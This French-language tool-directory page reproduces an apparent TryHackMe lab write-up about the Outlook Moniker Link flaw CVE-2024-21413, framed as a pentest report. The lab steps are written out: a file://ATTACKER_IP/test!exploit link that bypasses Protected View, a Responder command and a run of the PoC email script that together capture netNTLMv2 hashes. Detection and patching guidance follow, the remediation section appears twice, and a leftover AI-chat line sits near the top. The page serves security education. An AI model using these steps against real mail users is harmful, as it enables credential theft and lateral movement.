Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — Le 13 février 2024, Microsoft a publié une grave vulnérabilité de sécurité dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook. | Kitploit
Outils/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationSécurité des EmailsLabs et Pratique
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Voir le dépôt
8il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Le 13 février 2024, Microsoft a publié une grave vulnérabilité de sécurité dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook.

Partager

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Le 13 février 2024, Microsoft a publié une vulnérabilité de sécurité critique dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413 et connue sous le nom de Moniker Link Vulnerability. Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook. image

Excellent 👍 Voici la traduction complète + la rédaction sous forme de rapport de Test d'Intrusion (PT), en français professionnel et clair. Comme demandé – uniquement la traduction et la rédaction. Vous ajouterez les réponses, les captures d'écran et les compléments, et si vous le souhaitez, je vous aiderai par la suite.


Rapport de Test d'Intrusion

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Résumé Exécutif (Executive Summary)

Le 13 février 2024, Microsoft a publié une vulnérabilité de sécurité critique dans Microsoft Outlook, identifiée sous le nom CVE-2024-21413, et connue sous le nom de Moniker Link Vulnerability.

Cette vulnérabilité permet à un attaquant de contourner le mécanisme Protected View d'Outlook à l'aide d'un lien spécial (Moniker Link), et d'amener le client Outlook de la victime à vers un serveur contrôlé par l'attaquant – sans exécution de fichier et sans avertissement de sécurité efficace.

envoyer des identifiants de connexion (hash NTLM)

La vulnérabilité peut conduire à une fuite d'identifiants et il existe même une possibilité théorique d'exécution de code à distance (RCE) .


📌 Détails de la vulnérabilité

ParamètreValeur
IdentifiantCVE-2024-21413
Date de publication13 février 2024
DécouvreurHaifei Li – Check Point Research
ImpactFuite d'identifiants + RCE potentiel
GravitéCritique
Complexité d'attaqueFaible
Score CVSS9.8
Lien officielhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Versions affectées

La vulnérabilité affecte les versions suivantes :

  • Microsoft Office LTSC 2021 – à partir de la version 19.0.0
  • Microsoft 365 Apps for Enterprise – à partir de la version 16.0.1
  • Microsoft Office 2019 – à partir de la version 16.0.1
  • Microsoft Office 2016 – avant la version 16.0.5435.1001

🎓 Objectifs d'apprentissage (Learning Objectives)

  • Comprendre le fonctionnement de la vulnérabilité
  • Se familiariser avec le mécanisme Outlook Protected View
  • Exploiter la vulnérabilité pour une fuite d'identifiants
  • Mesures de détection (Detection)
  • Recommandations de prévention (Mitigation)

(Description de la vulnérabilité)

image

Microsoft Outlook permet d'afficher les e-mails au format HTML et d'analyser différents types de liens tels que http:// et https://. De plus, Outlook prend également en charge des liens spéciaux appelés Moniker Links, qui permettent de lancer des applications ou d'accéder à des ressources externes sur le système d'exploitation.

Normalement, lorsqu'un e-mail contient un lien qui lance une application externe ou accède à une ressource système (comme un lien file://), le mécanisme de sécurité Protected View d'Outlook est activé. Ce mécanisme affiche un avertissement de sécurité et bloque les actions dangereuses telles que l'exécution de code, les macros ou l'accès à des ressources réseau externes.

Cependant, une vulnérabilité a été découverte dans Outlook (CVE-2024-21413) qui permet de contourner le mécanisme Protected View par une simple manipulation d'un lien de type Moniker Link.

Ce que nous avons trouvé (Findings)

Au cours du test, il a été constaté que l'utilisation d'un lien normal du type :

file://ATTACKER_IP/test

amène Outlook à tenter d'accéder à une ressource réseau via le protocole SMB, mais cette tentative est bloquée par Protected View.

En revanche, lorsque le lien inclut le caractère spécial ! et une chaîne de texte supplémentaire, par exemple :

file://ATTACKER_IP/test!exploit

Outlook n'active pas Protected View et effectue une tentative de connexion au serveur distant.

Lors de cette tentative :

Outlook tente d'accéder à la ressource via SMB

Une demande d'authentification automatique est effectuée

Les identifiants de connexion de l'utilisateur sont envoyés à l'attaquant

Le hash Windows netNTLMv2 de la victime est capturé

Il est important de noter que le partage distant n'a pas besoin d'exister réellement, car la tentative d'authentification est effectuée dans tous les cas.

Impact

La vulnérabilité permet à un attaquant :

La fuite d'identifiants utilisateur (hash netNTLMv2)

La réalisation d'attaques hors ligne (Cracking / Pass-the-Hash)

Le déplacement latéral dans le réseau d'entreprise

De plus, étant donné que les Moniker Links utilisent le mécanisme COM (Component Object Model) de Windows, il existe une possibilité théorique d'exécution de code à distance (RCE). Cependant, à la date du test, il n'existe pas de Proof of Concept public pour une RCE réelle utilisant cette vulnérabilité.

Exploitation

Dans le cadre de l'attaque, un e-mail contenant un Moniker Link similaire à celui présenté dans la tâche précédente est envoyé à la victime. Le but de l'attaquant est de créer un e-mail avec un lien Moniker Link qui contourne le mécanisme Protected View d'Outlook, de sorte que dès que la victime clique sur le lien, son client Outlook tente de charger un fichier depuis la machine de l'attaquant. Cette action entraîne l'envoi et la capture du hash netNTLMv2 de la victime par l'attaquant.

Avant d'effectuer l'attaque, passons en revue un Proof of Concept (PoC) créé à des fins de démonstration (également disponible sur GitHub).

Auteur : CMNatic | https://github.com/cmnatic Version : 1.0 | 19/02/2024

Le code utilise le langage Python et envoie un e-mail HTML contenant un lien Moniker Link malveillant.

Description du PoC

Le PoC :

Prend une adresse e-mail d'attaquant et une adresse e-mail de victime

Nécessite un mot de passe pour l'authentification SMTP (Dans cette salle, le mot de passe pour [email protected] est : attacker)

Contient le contenu HTML de l'e-mail (html_content) avec un lien Moniker Link malveillant

Définit les champs de l'e-mail : Sujet, De, À

Envoie l'e-mail via le serveur de messagerie

Dans un scénario réel, un serveur SMTP contrôlé par l'attaquant est nécessaire (dans cette salle, le serveur est déjà fourni).

Écoute pour la capture de hash – Responder

Après l'envoi de l'e-mail, il faut exécuter un outil d'écoute de type Responder sur la machine de l'attaquant pour capturer les requêtes SMB.

Sur THM AttackBox, le nom de l'interface est ens5 :

responder -I ens5

Responder écoute les requêtes SMB, LLMNR et NBT-NS et permet la capture des identifiants d'authentification.

Ouverture de la machine victime

Ouvrez la machine victime via la fenêtre d'écran partagé

Lancez Outlook

Choisissez l'option "I don't want to sign in or create an account"

Fermez la fenêtre de saisie de la clé de produit

La boîte aux lettres de la victime est déjà préconfigurée

Exécution de l'exploit

Sur AttackBox :

Créez un nouveau fichier nommé exploit.py

Collez-y le code du PoC

Avant l'exécution, effectuez les ajustements suivants :

Mettez à jour l'adresse IP de la machine de l'attaquant dans le Moniker Link (ligne 12)

Remplacez la valeur MAILSERVER par l'adresse :

10.64.165.67

Ensuite, exécutez :

python3 exploit.py

Lorsque le mot de passe est demandé, saisissez :

attacker

Si l'opération a réussi, le message suivant s'affiche :

Email delivered

Résultat

Après avoir ouvert l'e-mail sur la machine victime et cliqué sur le lien "Click me" :

Outlook tente de se connecter à la machine de l'attaquant via SMB

Responder capture la tentative d'authentification

Le hash netNTLMv2 de l'utilisateur est capturé avec succès

L'attaque est terminée avec succès.

image

Detection

YARA

Une règle YARA a été créée par Florian Roth visant à identifier les e-mails contenant l'élément file:\ dans un Moniker Link – ce qui pourrait indiquer une tentative d'exploitation de CVE-2024-21413.

Exemple de la règle YARA (telle qu'elle apparaît dans la salle) :

La règle recherche des attributs généraux d'un e-mail (comme Subject: et Received:)

Et recherche en outre un motif suspect de lien file:// pointant vers un chemin UNC (\) accompagné d'une extension de fichier courante, incluant le caractère ! à la fin (caractéristique du contournement de Protected View)

(Le code lui-même reste tel quel dans l'original)

Wireshark

De plus, on peut voir la requête SMB sortant de la machine victime vers la machine attaquante dans une capture de paquets Wireshark.

Lors de la requête :

Une tentative d'authentification SMB est effectuée

On peut identifier un hash de type netNTLMv2 (parfois sous forme tronquée/abrégée)

Remediation

Prévention et durcissement (Remediation)

Microsoft a inclus des correctifs de sécurité pour remédier à cette vulnérabilité dans le cadre des mises à jour du Patch Tuesday de février. Vous pouvez consulter la liste des articles KB pertinents en fonction des versions d'Office sur le lien officiel de Microsoft.

Il est fortement recommandé de mettre à jour Microsoft Office via :

Windows Update

Microsoft Update Catalog

De plus, en attendant que les mises à jour soient appliquées sur tous les systèmes, il s'agit d'un rappel important pour la mise en œuvre de mesures de sécurité de base, et notamment pour sensibiliser les utilisateurs, par exemple :

Ne pas cliquer sur des liens aléatoires, en particulier provenant d'e-mails inattendus

Afficher un aperçu des liens avant de cliquer

Transmettre les e-mails suspects au responsable de la sécurité informatique de l'organisation

Étant donné que cette vulnérabilité contourne le mécanisme Protected View d'Outlook, il n'est pas possible de configurer Outlook pour bloquer cette attaque par de simples modifications de configuration.

De même, le blocage complet du protocole SMB n'est pas recommandé dans la plupart des organisations, car ce protocole est essentiel pour l'accès aux ressources réseau et aux partages de fichiers. Cependant, il est possible de mettre en place des blocages ou des restrictions au niveau du pare-feu, en fonction de la politique organisationnelle et de la structure du réseau.

Prévention et durcissement (Remediation)

Microsoft a inclus des correctifs de sécurité pour cette vulnérabilité dans le cadre des mises à jour du Patch Tuesday de février. Vous pouvez consulter la liste des articles KB pertinents en fonction de la version d'Office sur le lien officiel de Microsoft. Il est fortement recommandé de mettre à jour Microsoft Office via :

Windows Update

Microsoft Update Catalog

De plus, et jusqu'à ce que les mises à jour soient déployées sur tous les systèmes, il s'agit d'un rappel important pour la mise en œuvre de mesures de sécurité de base, et notamment pour sensibiliser les utilisateurs, par exemple :

Éviter de cliquer sur des liens aléatoires, en particulier provenant d'e-mails inattendus

Vérifier l'adresse du lien (aperçu) avant de cliquer

Transmettre les e-mails suspects au responsable de la sécurité informatique de l'organisation

Étant donné que cette vulnérabilité contourne le mécanisme Protected View d'Outlook, il n'est pas possible d'empêcher l'attaque par de simples modifications de configuration dans Outlook lui-même.

De même, le blocage complet du protocole SMB n'est pas recommandé dans la plupart des organisations, car ce protocole est essentiel pour l'accès aux partages de fichiers et aux ressources réseau. Cependant, il est possible de mettre en place des restrictions ou des blocages au niveau du pare-feu, en fonction de la politique de sécurité et de la structure du réseau d'entreprise.

Télécharger l’outil